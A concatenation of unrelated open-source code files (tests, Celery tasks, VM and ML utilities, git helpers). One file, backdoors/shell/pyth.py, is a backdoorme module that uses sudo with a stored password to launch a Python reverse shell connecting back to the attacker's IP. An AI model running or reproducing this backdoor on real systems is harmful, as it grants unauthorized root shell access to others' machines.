# Copyright The OpenTelemetry Authors # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import unittest from collections import OrderedDict from unittest.mock import mock_open, patch from opentelemetry.sdk.extension.aws.resource.ecs import AwsEcsResourceDetector from opentelemetry.semconv.resource import ( CloudPlatformValues, CloudProviderValues, ResourceAttributes, ) MockEcsResourceAttributes = { ResourceAttributes.CLOUD_PROVIDER: CloudProviderValues.AWS.value, ResourceAttributes.CLOUD_PLATFORM: CloudPlatformValues.AWS_ECS.value, ResourceAttributes.CONTAINER_NAME: "mock-container-name", ResourceAttributes.CONTAINER_ID: "a4d00c9dd675d67f866c786181419e1b44832d4696780152e61afd44a3e02856", } class AwsEcsResourceDetectorTest(unittest.TestCase): @patch.dict( "os.environ", {"ECS_CONTAINER_METADATA_URI": "mock-uri"}, clear=True, ) @patch( "socket.gethostname", return_value=f"{MockEcsResourceAttributes[ResourceAttributes.CONTAINER_NAME]}", ) @patch( "builtins.open", new_callable=mock_open, read_data=f"""14:name=systemd:/docker/{MockEcsResourceAttributes[ResourceAttributes.CONTAINER_ID]} 13:rdma:/ 12:pids:/docker/bogusContainerIdThatShouldNotBeOneSetBecauseTheFirstOneWasPicked 11:hugetlb:/docker/bogusContainerIdThatShouldNotBeOneSetBecauseTheFirstOneWasPicked 10:net_prio:/docker/bogusContainerIdThatShouldNotBeOneSetBecauseTheFirstOneWasPicked 9:perf_event:/docker/bogusContainerIdThatShouldNotBeOneSetBecauseTheFirstOneWasPicked 8:net_cls:/docker/bogusContainerIdThatShouldNotBeOneSetBecauseTheFirstOneWasPicked 7:freezer:/docker/ 6:devices:/docker/bogusContainerIdThatShouldNotBeOneSetBecauseTheFirstOneWasPicked 5:memory:/docker/bogusContainerIdThatShouldNotBeOneSetBecauseTheFirstOneWasPicked 4:blkio:/docker/bogusContainerIdThatShouldNotBeOneSetBecauseTheFirstOneWasPicked 3:cpuacct:/docker/bogusContainerIdThatShouldNotBeOneSetBecauseTheFirstOneWasPicked 2:cpu:/docker/bogusContainerIdThatShouldNotBeOneSetBecauseTheFirstOneWasPicked 1:cpuset:/docker/bogusContainerIdThatShouldNotBeOneSetBecauseTheFirstOneWasPicked """, ) def test_simple_create(self, mock_open_function, mock_socket_gethostname): actual = AwsEcsResourceDetector().detect() self.assertDictEqual( actual.attributes.copy(), OrderedDict(MockEcsResourceAttributes) )
tests/components/homekit/conftest.py
MrDelik/core
30,023
11096302
"""HomeKit session fixtures.""" from contextlib import suppress import os from unittest.mock import patch from pyhap.accessory_driver import AccessoryDriver import pytest from homeassistant.components.device_tracker.legacy import YAML_DEVICES from homeassistant.components.homekit.const import EVENT_HOMEKIT_CHANGED from tests.common import async_capture_events, mock_device_registry, mock_registry @pytest.fixture def hk_driver(loop): """Return a custom AccessoryDriver instance for HomeKit accessory init.""" with patch("pyhap.accessory_driver.AsyncZeroconf"), patch( "pyhap.accessory_driver.AccessoryEncoder" ), patch("pyhap.accessory_driver.HAPServer.async_stop"), patch( "pyhap.accessory_driver.HAPServer.async_start" ), patch( "pyhap.accessory_driver.AccessoryDriver.publish" ), patch( "pyhap.accessory_driver.AccessoryDriver.persist" ): yield AccessoryDriver(pincode=b"123-45-678", address="127.0.0.1", loop=loop) @pytest.fixture def mock_hap(loop, mock_zeroconf): """Return a custom AccessoryDriver instance for HomeKit accessory init.""" with patch("pyhap.accessory_driver.AsyncZeroconf"), patch( "pyhap.accessory_driver.AccessoryEncoder" ), patch("pyhap.accessory_driver.HAPServer.async_stop"), patch( "pyhap.accessory_driver.HAPServer.async_start" ), patch( "pyhap.accessory_driver.AccessoryDriver.publish" ), patch( "pyhap.accessory_driver.AccessoryDriver.async_start" ), patch( "pyhap.accessory_driver.AccessoryDriver.async_stop" ), patch( "pyhap.accessory_driver.AccessoryDriver.persist" ): yield AccessoryDriver(pincode=b"123-45-678", address="127.0.0.1", loop=loop) @pytest.fixture def events(hass): """Yield caught homekit_changed events.""" return async_capture_events(hass, EVENT_HOMEKIT_CHANGED) @pytest.fixture(name="device_reg") def device_reg_fixture(hass): """Return an empty, loaded, registry.""" return mock_device_registry(hass) @pytest.fixture(name="entity_reg") def entity_reg_fixture(hass): """Return an empty, loaded, registry.""" return mock_registry(hass) @pytest.fixture def demo_cleanup(hass): """Clean up device tracker demo file.""" yield with suppress(FileNotFoundError): os.remove(hass.config.path(YAML_DEVICES))
tests/test_ast.py
odinsemvosem/SKompiler
112
11096320
<reponame>odinsemvosem/SKompiler<gh_stars>100-1000 #pylint: disable=wildcard-import,unused-wildcard-import,no-member import numpy as np from skompiler.ast import * from skompiler.dsl import * def test_dsl(): assert isinstance(ident('x'), Identifier) assert isinstance(ident('x', 1), VectorIdentifier) assert isinstance(const(1), NumberConstant) assert isinstance(const([1]), VectorConstant) assert isinstance(const([[1]]), MatrixConstant) assert isinstance(const(np.array([1], dtype='int')[0]), NumberConstant) assert isinstance(const(np.array(1)), NumberConstant) mtx = const(np.array([[1, 2]])) assert isinstance(mtx, MatrixConstant) assert len(mtx) == 1 v = mtx[0] assert isinstance(v, VectorConstant) assert len(v) == 2 n = v[1] assert isinstance(n, NumberConstant) assert n.value == 2 ids = vector(map(ident, 'abc')) assert isinstance(ids, MakeVector) assert len(ids.elems) == 3 assert isinstance(ids.elems[0], Identifier) def test_singleton(): assert Add() is Add() assert func.Add is Add() assert func.Mul is Mul()
sketchy/controllers/tasks.py
fakeNetflix/sketchy
790
11096321
# Copyright 2014 Netflix, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import boto import lxml.html as LH import lxml.html.clean as clean import os import re import json import requests from requests.exceptions import ConnectionError from requests import post from boto.s3.key import Key from boto.s3.connection import OrdinaryCallingFormat from subprocess32 import PIPE from collections import defaultdict from sketchy import db, app, celery from sketchy.models.capture import Capture from sketchy.models.static import Static from sketchy.controllers.validators import grab_domain import subprocess32 import socket import netaddr @celery.task(name='check_url', bind=True) def check_url(self, capture_id=0, retries=0, model='capture'): """ Check if a URL exists without downloading the whole file. We only check the URL header. """ # check for env variable for session cookies cookies = {} try: cookies = dict(item.split("=") for item in os.getenv('phantomjs_cookies').split(" ")) except: pass capture_record = Capture.query.filter(Capture.id == capture_id).first() capture_record.job_status = 'STARTED' # Write the number of retries to the capture record db.session.add(capture_record) capture_record.retry = retries db.session.commit() # Only retrieve the headers of the request, and return response code try: response = "" verify_ssl = app.config['SSL_HOST_VALIDATION'] response = requests.get(capture_record.url, verify=verify_ssl, allow_redirects=False, timeout=5, headers={"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:28.0) Gecko/20100101 Firefox/28.0"}, cookies=cookies) capture_record.url_response_code = response.status_code if capture_record.status_only: capture_record.job_status = 'COMPLETED' capture_record.capture_status = '%s HTTP STATUS CODE' % (response.status_code) if capture_record.callback: finisher(capture_record) else: capture_record.capture_status = '%s HTTP STATUS CODE' % (response.status_code) # If URL doesn't return a valid status code or times out, raise an exception except Exception as err: capture_record.job_status = 'RETRY' capture_record.capture_status = str(err) capture_record.url_response_code = 0 check_url.retry(kwargs={'capture_id': capture_id, 'retries': capture_record.retry + 1, 'model': model}, exc=err, countdown=app.config['COOLDOWN'], max_retries=app.config['MAX_RETRIES']) # If the code was not a good code, record the status as a 404 and raise an exception finally: db.session.commit() return str(response.status_code) def do_capture(status_code, the_record, base_url, model='capture', phantomjs_timeout=app.config['PHANTOMJS_TIMEOUT']): """ Create a screenshot, text scrape, from a provided html file. This depends on phantomjs and an associated javascript file to perform the captures. In the event an error occurs, an exception is raised and handled by the celery task or the controller that called this method. """ # Make sure the the_record db.session.add(the_record) # If the capture is for static content, use a different PhantomJS config file if model == 'static': capture_name = the_record.filename service_args = [ app.config['PHANTOMJS'], '--ssl-protocol=any', '--ignore-ssl-errors=yes', os.path.dirname(os.path.dirname(os.path.abspath(__file__))) + '/assets/static.js', app.config['LOCAL_STORAGE_FOLDER'], capture_name] content_to_parse = os.path.join(app.config['LOCAL_STORAGE_FOLDER'], capture_name) else: capture_name = grab_domain(the_record.url) + '_' + str(the_record.id) service_args = [ app.config['PHANTOMJS'], '--ssl-protocol=any', '--ignore-ssl-errors=yes', os.path.dirname(os.path.dirname(os.path.abspath(__file__))) + '/assets/capture.js', the_record.url, os.path.join(app.config['LOCAL_STORAGE_FOLDER'], capture_name)] content_to_parse = os.path.join(app.config['LOCAL_STORAGE_FOLDER'], capture_name + '.html') # Using subprocess32 backport, call phantom and if process hangs kill it pid = subprocess32.Popen(service_args, stdout=PIPE, stderr=PIPE) try: stdout, stderr = pid.communicate(timeout=phantomjs_timeout) except subprocess32.TimeoutExpired: pid.kill() stdout, stderr = pid.communicate() app.logger.error('PhantomJS Capture timeout at {} seconds'.format(phantomjs_timeout)) raise subprocess32.TimeoutExpired('phantomjs capture',phantomjs_timeout) # If the subprocess has an error, raise an exception if stderr or stdout: raise Exception("{}{}".format(stdout, stderr)) # Strip tags and parse out all text ignore_tags = ('script', 'noscript', 'style') with open(content_to_parse, 'r') as content_file: content = content_file.read() cleaner = clean.Cleaner() content = cleaner.clean_html(content) doc = LH.fromstring(content) output = "" for elt in doc.iterdescendants(): if elt.tag in ignore_tags: continue text = elt.text or '' tail = elt.tail or '' wordz = " ".join((text, tail)).strip('\t') if wordz and len(wordz) >= 2 and not re.match("^[ \t\n]*$", wordz): output += wordz.encode('utf-8') # Since the filename format is different for static captures, update the filename # This will ensure the URLs are pointing to the correct resources if model == 'static': capture_name = capture_name.split('.')[0] # Wite our html text that was parsed into our capture folder parsed_text = open(os.path.join(app.config['LOCAL_STORAGE_FOLDER'], capture_name + '.txt'), 'wb') parsed_text.write(output) # Update the sketch record with the local URLs for the sketch, scrape, and html captures the_record.sketch_url = base_url + '/files/' + capture_name + '.png' the_record.scrape_url = base_url + '/files/' + capture_name + '.txt' the_record.html_url = base_url + '/files/' + capture_name + '.html' # Create a dict that contains what files may need to be written to S3 files_to_write = defaultdict(list) files_to_write['sketch'] = capture_name + '.png' files_to_write['scrape'] = capture_name + '.txt' files_to_write['html'] = capture_name + '.html' # If we are not writing to S3, update the capture_status that we are completed. if not app.config['USE_S3']: the_record.job_status = "COMPLETED" the_record.capture_status = "LOCAL_CAPTURES_CREATED" else: the_record.capture_status = "LOCAL_CAPTURES_CREATED" db.session.commit() return files_to_write def s3_save(files_to_write, the_record): """ Write a sketch, scrape, and html file to S3 """ db.session.add(the_record) # These are the content-types for the files S3 will be serving up response_types = {'sketch': 'image/png', 'scrape': 'text/plain', 'html': 'text/html'} # Iterate through each file we need to write to s3 for capture_type, file_name in files_to_write.items(): # Connect to S3, generate Key, set path based on capture_type, write file to S3 conn = boto.s3.connect_to_region( region_name = app.config.get('S3_BUCKET_REGION_NAME'), calling_format = boto.s3.connection.OrdinaryCallingFormat() ) key = Key(conn.get_bucket(app.config.get('S3_BUCKET_PREFIX'))) path = "sketchy/{}/{}".format(capture_type, file_name) key.key = path key.set_contents_from_filename(app.config['LOCAL_STORAGE_FOLDER'] + '/' + file_name) # Generate a URL for downloading the files url = conn.generate_url( app.config.get('S3_LINK_EXPIRATION'), 'GET', bucket=app.config.get('S3_BUCKET_PREFIX'), key=key.key, response_headers={ 'response-content-type': response_types[capture_type], 'response-content-disposition': 'attachment; filename=' + file_name }) # Generate appropriate url based on capture_type if capture_type == 'sketch': the_record.sketch_url = str(url) if capture_type == 'scrape': the_record.scrape_url = str(url) if capture_type == 'html': the_record.html_url = str(url) # Remove local files if we are saving to S3 os.remove(os.path.join(app.config['LOCAL_STORAGE_FOLDER'], files_to_write['sketch'])) os.remove(os.path.join(app.config['LOCAL_STORAGE_FOLDER'], files_to_write['scrape'])) os.remove(os.path.join(app.config['LOCAL_STORAGE_FOLDER'], files_to_write['html'])) # If we don't have a finisher task is complete if the_record.callback: the_record.capture_status = 'S3_ITEMS_SAVED' else: the_record.capture_status = 'S3_ITEMS_SAVED' the_record.job_status = 'COMPLETED' db.session.commit() def finisher(the_record): """ POST finished chain to a callback URL provided """ db.session.add(the_record) verify_ssl = app.config['SSL_HOST_VALIDATION'] # Set the correct headers for the postback headers = {'Content-type': 'application/json', 'Accept': 'text/plain', 'Connection': 'close'} #proxy = {"http": "127.0.0.1:8080"} try: # Blacklist IP addresses ip_addr = socket.gethostbyname(grab_domain(the_record.url)) if app.config['IP_BLACKLISTING']: if netaddr.all_matching_cidrs(ip_addr, app.config['IP_BLACKLISTING_RANGE'].split(',')): the_record.capture_status = "IP BLACKLISTED:{} - ".format(ip_addr) + the_record.capture_status except: pass req = post(the_record.callback, verify=verify_ssl, data=json.dumps(the_record.as_dict()), headers=headers) # If a 4xx or 5xx status is received, raise an exception req.raise_for_status() # Update capture_record and save to database the_record.job_status = 'COMPLETED' # Removed to propagate blacklist message #the_record.capture_status = 'CALLBACK_SUCCEEDED' db.session.add(the_record) db.session.commit() @celery.task(name='celery_static_capture', ignore_result=True, bind=True) def celery_static_capture(self, base_url, capture_id=0, retries=0, model="static"): """ Celery task used to create a sketch and scrape with a provided static HTML file. Task also writes files to S3 or posts a callback depending on configuration file. """ static_record = Static.query.filter(Static.id == capture_id).first() # Write the number of retries to the capture record db.session.add(static_record) static_record.retry = retries db.session.commit() # First perform the captures, then either write to S3, perform a callback, or neither try: # call the main capture function to retrieve sketches and scrapes files_to_write = do_capture(0, static_record, base_url, model='static') # Call the s3 save function if s3 is configured, and perform callback if configured. if app.config['USE_S3']: if static_record.callback: s3_save(files_to_write, static_record) finisher(static_record) else: s3_save(files_to_write, static_record) elif static_record.callback: finisher(static_record) # Only execute retries on ConnectionError exceptions, otherwise fail immediately except ConnectionError as err: app.logger.error(err) static_record.job_status = 'RETRY' static_record.capture_status = str(err) static_record.retry = retries + 1 db.session.commit() raise celery_static_capture.retry(args=[base_url], kwargs={'capture_id' :capture_id, 'retries': static_record.retry + 1, 'model': 'static'}, exc=err, countdown=app.config['COOLDOWN'], max_retries=app.config['MAX_RETRIES']) # Catch exceptions raised by any functions called except Exception as err: app.logger.error(err) static_record.job_status = 'FAILURE' if str(err): static_record.capture_status = str(err) raise Exception finally: db.session.commit() @celery.task(name='celery_capture', ignore_result=True, bind=True) def celery_capture(self, status_code, base_url, capture_id=0, retries=0, model="capture", phantomjs_timeout=app.config['PHANTOMJS_TIMEOUT']): """ Celery task used to create sketch, scrape, html. Task also writes files to S3 or posts a callback depending on configuration file. """ capture_record = Capture.query.filter(Capture.id == capture_id).first() # Write the number of retries to the capture record db.session.add(capture_record) capture_record.retry = retries db.session.commit() try: # Perform a callback or complete the task depending on error code and config if capture_record.url_response_code > 400 and app.config['CAPTURE_ERRORS'] == False: if capture_record.callback: finisher(capture_record) else: capture_record.job_status = 'COMPLETED' return True # Only execute retries on ConnectionError exceptions, otherwise fail immediately except ConnectionError as err: app.logger.error(err) capture_record.job_status = 'RETRY' capture_record.capture_status = str(err) capture_record.retry = retries + 1 raise celery_capture.retry(args=[status_code, base_url], kwargs = { 'capture_id' :capture_id, 'retries': capture_record.retry + 1, 'model': 'capture'}, exc=err, countdown=app.config['COOLDOWN'], max_retries=app.config['MAX_RETRIES']) except Exception as err: app.logger.error(err) capture_record.job_status = 'FAILURE' if str(err): capture_record.capture_status = str(err) capture_record.capture_status = str(err) finally: db.session.commit() # First perform the captures, then either write to S3, perform a callback, or neither try: # call the main capture function to retrieve sketches, scrapes, and html files_to_write = do_capture(status_code, capture_record, base_url, model='capture', phantomjs_timeout=phantomjs_timeout) # Call the s3 save function if s3 is configured, and perform callback if configured. if app.config['USE_S3']: if capture_record.callback: s3_save(files_to_write, capture_record) finisher(capture_record) else: s3_save(files_to_write, capture_record) elif capture_record.callback: finisher(capture_record) # If the screenshot generation timed out, try to render again except subprocess32.TimeoutExpired as err: app.logger.error(err) capture_record.job_status = 'RETRY' capture_record.capture_status = str(err) capture_record.retry = retries + 1 raise celery_capture.retry(args=[status_code, base_url], kwargs={'capture_id' :capture_id, 'retries': capture_record.retry, 'model': 'capture', 'phantomjs_timeout': (capture_record.retry * 5) + phantomjs_timeout}, exc=err, countdown=app.config['COOLDOWN'], max_retries=app.config['MAX_RETRIES']) # Retry on connection error exceptions except ConnectionError as err: app.logger.error(err) capture_record.job_status = 'RETRY' capture_record.capture_status = str(err) capture_record.retry = retries + 1 raise celery_capture.retry(args=[status_code, base_url], kwargs={'capture_id' :capture_id, 'retries': capture_record.retry, 'model': 'capture'}, exc=err, countdown=app.config['COOLDOWN'], max_retries=app.config['MAX_RETRIES']) # For all other exceptions, fail immediately except Exception as err: app.logger.error(err) if str(err): capture_record.capture_status = str(err) capture_record.job_status = 'FAILURE' raise Exception finally: db.session.commit()
utils/gyb_benchmark_support.py
francisvm/swift
427
11096330
<reponame>francisvm/swift # ===--- gyb_benchmark_support.py --------------------*- coding: utf-8 -*-===// # # This source file is part of the Swift.org open source project # # Copyright (c) 2014 - 2017 Apple Inc. and the Swift project authors # Licensed under Apache License v2.0 with Runtime Library Exception # # See https://swift.org/LICENSE.txt for license information # See https://swift.org/CONTRIBUTORS.txt for the list of Swift project authors import os import re script_dir = os.path.dirname(os.path.realpath(__file__)) perf_dir = os.path.realpath(os.path.join(script_dir, '../benchmark')) single_source_dir = os.path.join(perf_dir, 'single-source') multi_source_dir = os.path.join(perf_dir, 'multi-source') def all_files(directory, extension): # matching: [directory]/**/*[extension] return [ os.path.join(root, f) for root, _, files in os.walk(directory) for f in files if f.endswith(extension) ] # CMakeList single-source test_files = all_files(single_source_dir, '.swift') tests = sorted(os.path.basename(x).split('.')[0] for x in test_files) # CMakeList multi-source class MultiSourceBench(object): def __init__(self, path): self.name = os.path.basename(path) self.files = [x for x in os.listdir(path) if x.endswith('.swift')] multisource_benches = [ MultiSourceBench(os.path.join(multi_source_dir, x)) for x in os.listdir(multi_source_dir) if os.path.isdir(os.path.join(multi_source_dir, x)) ] if os.path.isdir(multi_source_dir) else [] def get_run_funcs(filepath): content = open(filepath).read() return re.findall(r'func run_(.*?)\(', content) def find_run_funcs(): swift_files = all_files(single_source_dir, '.swift') swift_files += all_files(multi_source_dir, '.swift') return sorted([func for f in swift_files for func in get_run_funcs(f)]) all_run_funcs = find_run_funcs()
src/zeep/wsse/__init__.py
vascohenriques/python-zeep
1,763
11096353
<filename>src/zeep/wsse/__init__.py from .compose import Compose # noqa from .signature import BinarySignature, MemorySignature, Signature # noqa from .username import UsernameToken # noqa
tableschema/types/duration.py
vincentchevrier/tableschema-py
224
11096374
<gh_stars>100-1000 # -*- coding: utf-8 -*- from __future__ import absolute_import from __future__ import division from __future__ import print_function from __future__ import unicode_literals import six import datetime import isodate from ..config import ERROR # Module API def cast_duration(format, value, **options): if not isinstance(value, (isodate.Duration, datetime.timedelta)): if not isinstance(value, six.string_types): return ERROR try: value = isodate.parse_duration(value) except Exception: return ERROR return value
src/vm_test.py
laubonghaudoi/Cantonese
1,188
11096401
<reponame>laubonghaudoi/Cantonese import register_vm as r_vm import stack_vm as s_vm def test_register_vm() -> None: CantoneseState = r_vm.CanState("") CantoneseState.push_boolean(True) CantoneseState.dump() CantoneseState.push_integer(10) CantoneseState.dump() CantoneseState.push_null() CantoneseState.dump() CantoneseState.push_string("Hello World") CantoneseState.dump() CantoneseState.push_value(-4) CantoneseState.dump() CantoneseState.replace(3) CantoneseState.dump() CantoneseState.set_top(6) CantoneseState.dump() CantoneseState.remove(-3) CantoneseState.dump() CantoneseState.set_top(-5) CantoneseState.dump() def test_stack_vm() -> None: ins = [ s_vm.Instruction(1, "OP_LOAD_NAME", 0), s_vm.Instruction(2, "OP_LOAD_CONST", 0), s_vm.Instruction(3, "OP_CALL_FUNCTION", 1), s_vm.Instruction(4, "OP_RETURN", 0) ] code = s_vm.Code() code.ins_lst = ins code.co_consts = {0 : ['string', ' " Hello World " ']} code.co_names = {0 : 'print'} cs = s_vm.CanState(code) cs._run() if __name__ == '__main__': print("test register vm:") test_register_vm() print("test stack vm:") test_stack_vm()
ztag/annotations/FtpSoftAtHome.py
justinbastress/ztag
107
11096424
<reponame>justinbastress/ztag import re from ztag.annotation import Manufacturer from ztag.annotation import Annotation from ztag.annotation import Type from ztag.annotation import OperatingSystem from ztag import protocols import ztag.test class FtpSoftAtHome(Annotation): protocol = protocols.FTP subprotocol = protocols.FTP.BANNER port = None manufact_re = re.compile( "^220---------- Welcome to SoftAtHome FTP Server", re.IGNORECASE ) tests = { "FtpSoftAtHome_1": { "global_metadata": { "manufacturer": Manufacturer.SOFT_AT_HOME, }, "local_metadata": { "product": "SoftAtHome Framework" } } } def process(self, obj, meta): banner = obj["banner"] if self.manufact_re.search(banner): meta.global_metadata.manufacturer = Manufacturer.SOFT_AT_HOME meta.local_metadata.product = "SoftAtHome Framework" return meta """ Tests "220---------- Welcome to SoftAtHome FTP Server [privsep] ---------\r\n220-You are user number 1 of 32 allowed.\r\n220-Local time is now 00:31. Server port: 21.\r\n220-This is a private system - No anonymous login\r\n220-IPv6 connections are also welcome on this server.\r\n220 You will be disconnected after 10 minutes of inactivity.\r\n" "220---------- Welcome to SoftAtHome FTP Server [privsep] ---------\r\n220-You are user number 1 of 32 allowed.\r\n220-Local time is now 00:31. Server port: 21.\r\n220-This is a private system - No anonymous login\r\n220-IPv6 connections are also welcome on this server.\r\n220 You will be disconnected after 10 minutes of inactivity.\r\n" "220---------- Welcome to SoftAtHome FTP Server [privsep] ---------\r\n220-You are user number 1 of 32 allowed.\r\n220-Local time is now 00:32. Server port: 21.\r\n220-This is a private system - No anonymous login\r\n220-IPv6 connections are also welcome on this server.\r\n220 You will be disconnected after 10 minutes of inactivity.\r\n" "220---------- Welcome to SoftAtHome FTP Server [privsep] ---------\r\n220-You are user number 1 of 32 allowed.\r\n220-Local time is now 01:33. Server port: 21.\r\n220-This is a private system - No anonymous login\r\n220-IPv6 connections are also welcome on this server.\r\n220 You will be disconnected after 10 minutes of inactivity.\r\n" "220---------- Welcome to SoftAtHome FTP Server [privsep] ---------\r\n220-You are user number 1 of 32 allowed.\r\n220-Local time is now 00:34. Server port: 21.\r\n220-This is a private system - No anonymous login\r\n220-IPv6 connections are also welcome on this server.\r\n220 You will be disconnected after 10 minutes of inactivity.\r\n" "220---------- Welcome to SoftAtHome FTP Server [privsep] ---------\r\n220-You are user number 1 of 32 allowed.\r\n220-Local time is now 00:34. Server port: 21.\r\n220-This is a private system - No anonymous login\r\n220-IPv6 connections are also welcome on this server.\r\n220 You will be disconnected after 10 minutes of inactivity.\r\n" "220---------- Welcome to SoftAtHome FTP Server [privsep] ---------\r\n220-You are user number 1 of 32 allowed.\r\n220-Local time is now 00:35. Server port: 21.\r\n220-This is a private system - No anonymous login\r\n220-IPv6 connections are also welcome on this server.\r\n220 You will be disconnected after 10 minutes of inactivity.\r\n" """
src/scriv/gitinfo.py
kurtmckee/scriv
110
11096438
<filename>src/scriv/gitinfo.py """Get information from git.""" import logging import os import subprocess import sys from pathlib import Path import click from .shell import run_command, run_simple_command logger = logging.getLogger() def user_nick() -> str: """ Get a short name for the current user. """ ok, out = run_command("git config --get github.user") if ok: return out.strip() ok, out = run_command("git config --get user.email") if ok: nick = out.partition("@")[0] return nick return os.getenv("USER", "somebody") def current_branch_name() -> str: """ Get the current branch name. """ return run_simple_command("git rev-parse --abbrev-ref HEAD") def git_config(option: str) -> str: """ Return a git config value. """ return run_simple_command("git config --get {}".format(option)) def git_config_bool(option: str) -> bool: """ Return a boolean git config value, defaulting to False. """ return git_config(option) == "true" def git_editor() -> str: """ Get the command name of the editor Git will launch. """ return run_simple_command("git var GIT_EDITOR") def git_edit(filename: Path) -> None: """Edit a file using the same editor Git chooses.""" click.edit(filename=str(filename), editor=git_editor()) def git_add(filename: Path) -> None: """Git add a file. If it fails, sys.exit.""" ret = subprocess.call(["git", "add", str(filename)]) if ret == 0: logger.info("Added {}".format(filename)) else: logger.error("Couldn't add {}".format(filename)) sys.exit(ret) def git_rm(filename: Path) -> None: """Git rm a file. If it fails, sys.exit.""" ret = subprocess.call(["git", "rm", str(filename)]) if ret == 0: logger.info("Removed {}".format(filename)) else: logger.error("Couldn't remove {}".format(filename)) sys.exit(ret)
backdoors/shell/pyth.py
mehrdad-shokri/backdoorme
796
11096461
<reponame>mehrdad-shokri/backdoorme<filename>backdoors/shell/pyth.py from backdoors.backdoor import * class Pyth(Backdoor): prompt = Fore.RED + "(py) " + Fore.BLUE + ">> " + Fore.RESET def __init__(self, core): cmd.Cmd.__init__(self) self.intro = GOOD + "Using Python module..." self.core = core self.options = { "port" : Option("port", 53922, "port to connect to", True), } self.modules = {} self.allow_modules = True self.help_text = INFO + "Uses a short python script to listen for commands and send output back to the user." def get_command(self): command = "echo " + self.core.curtarget.pword + " | sudo -S python -c \"import socket, subprocess, os; \ s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); \ s.connect(('" + self.core.localIP + "', " + str(self.get_value("port")) + ")); \ os.dup2(s.fileno(),0); \ os.dup2(s.fileno(),1); \ os.dup2(s.fileno(),2); \ subprocess.call(['/bin/bash', '-i'])\" " #print(command) return command def do_exploit(self, args): self.listen() self.core.curtarget.ssh.exec_command(self.get_command()) print(GOOD + "Python backdoor on %s attempted." % self.get_value("port")) for mod in self.modules.keys(): print(INFO + "Attempting to execute " + mod.name + " module...") mod.exploit()
mindspore/python/mindspore/_extends/remote/kernel_build_server_ascend.py
PowerOlive/mindspore
3,200
11096474
<reponame>PowerOlive/mindspore # Copyright 2020-2021 Huawei Technologies Co., Ltd # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================ """kernel build server for ascend""" import sys import warnings import json from mindspore._extends.parallel_compile.tbe_compiler.tbe_job_manager import TbeJobManager from mindspore._extends.remote.kernel_build_server import Messager, get_logger, AkgBuilder class AscendMessager(Messager): """ Ascend Messager It works as a server, communicating with c++ client. """ def __init__(self, fdin, fdout): super().__init__(fdin, fdout) get_logger().info("[TRACE] Ascend Messager init...") self.tbe_builder = TbeJobManager() self.akg_builder = AkgBuilder("ASCEND") def handle(self): """ Communicate with remote client. Reference protocol between them at PR#3821 and PR#3935 """ arg = self.get_message() if arg.startswith('AKG'): self.akg_builder.handle(self, arg) else: job_json = dict() try: job_json = json.loads(arg) except json.decoder.JSONDecodeError: get_logger().error("[TRACE] Request is not a json message: {}".format(arg)) self.send_ack(False) self.exit() finally: pass if "job_type" in job_json: res = self.tbe_builder.job_handler(arg) self.send_res(res) else: get_logger().error("[TRACE] Request is not a TBE Job message: {}".format(arg)) self.send_ack(False) self.exit() def exit(self): self.tbe_builder.reset() get_logger().info("[TRACE] Ascend Messager Exit...") exit() if __name__ == '__main__': warnings.simplefilter("ignore") if len(sys.argv) != 3: raise Exception('Incorrect argv: {}'.format(sys.argv)) get_logger().debug(f"[TRACE] argv: {str(sys.argv)}") messager = AscendMessager(int(sys.argv[1]), int(sys.argv[2])) messager.run()
VisualBERT/mmf/trainers/core/evaluation_loop.py
Fostereee/Transformer-MM-Explainability
322
11096498
# Copyright (c) Facebook, Inc. and its affiliates. import logging from abc import ABC from typing import Any, Dict, Tuple, Type import torch import tqdm from VisualBERT.mmf.common.meter import Meter from VisualBERT.mmf.common.report import Report from VisualBERT.mmf.common.sample import to_device from VisualBERT.mmf.utils.distributed import is_master from VisualBERT.mmf.models.transformers.backends import ExplanationGenerator from VisualBERT import perturbation_arguments logger = logging.getLogger(__name__) class TrainerEvaluationLoopMixin(ABC): def evaluation_loop( self, loader, use_tqdm: bool = False, single_batch: bool = False ) -> Tuple[Dict[str, Any], Type[Meter]]: meter = Meter() with torch.no_grad(): self.model.eval() disable_tqdm = not use_tqdm or not is_master() combined_report = None for batch in tqdm.tqdm(loader, disable=disable_tqdm): report = self._forward(batch) self.update_meter(report, meter) # accumulate necessary params for metric calculation if combined_report is None: combined_report = report else: combined_report.accumulate_tensor_fields_and_loss( report, self.metrics.required_params ) combined_report.batch_size += report.batch_size if single_batch is True: break combined_report.metrics = self.metrics(combined_report, combined_report) self.update_meter(combined_report, meter, eval_mode=True) # enable train mode again self.model.train() return combined_report, meter def prediction_loop(self, dataset_type: str) -> None: reporter = self.dataset_loader.get_test_reporter(dataset_type) with torch.no_grad(): self.model.eval() logger.info(f"Starting {dataset_type} inference predictions") while reporter.next_dataset(): dataloader = reporter.get_dataloader() for batch in tqdm.tqdm(dataloader): prepared_batch = reporter.prepare_batch(batch) prepared_batch = to_device(prepared_batch, torch.device("cuda")) with torch.cuda.amp.autocast(enabled=self.training_config.fp16): model_output = self.model(prepared_batch) report = Report(prepared_batch, model_output) reporter.add_to_report(report, self.model) logger.info("Finished predicting") self.model.train() class TrainerEvaluationLoopMixinPert(ABC): def evaluation_loop(self, loader, on_test_end, use_tqdm: bool = False): self.model.eval() expl = ExplanationGenerator.SelfAttentionGenerator(self.model) method = perturbation_arguments.args.method pert_type = "pos" if perturbation_arguments.args.is_positive_pert else "neg" modality = "text" if 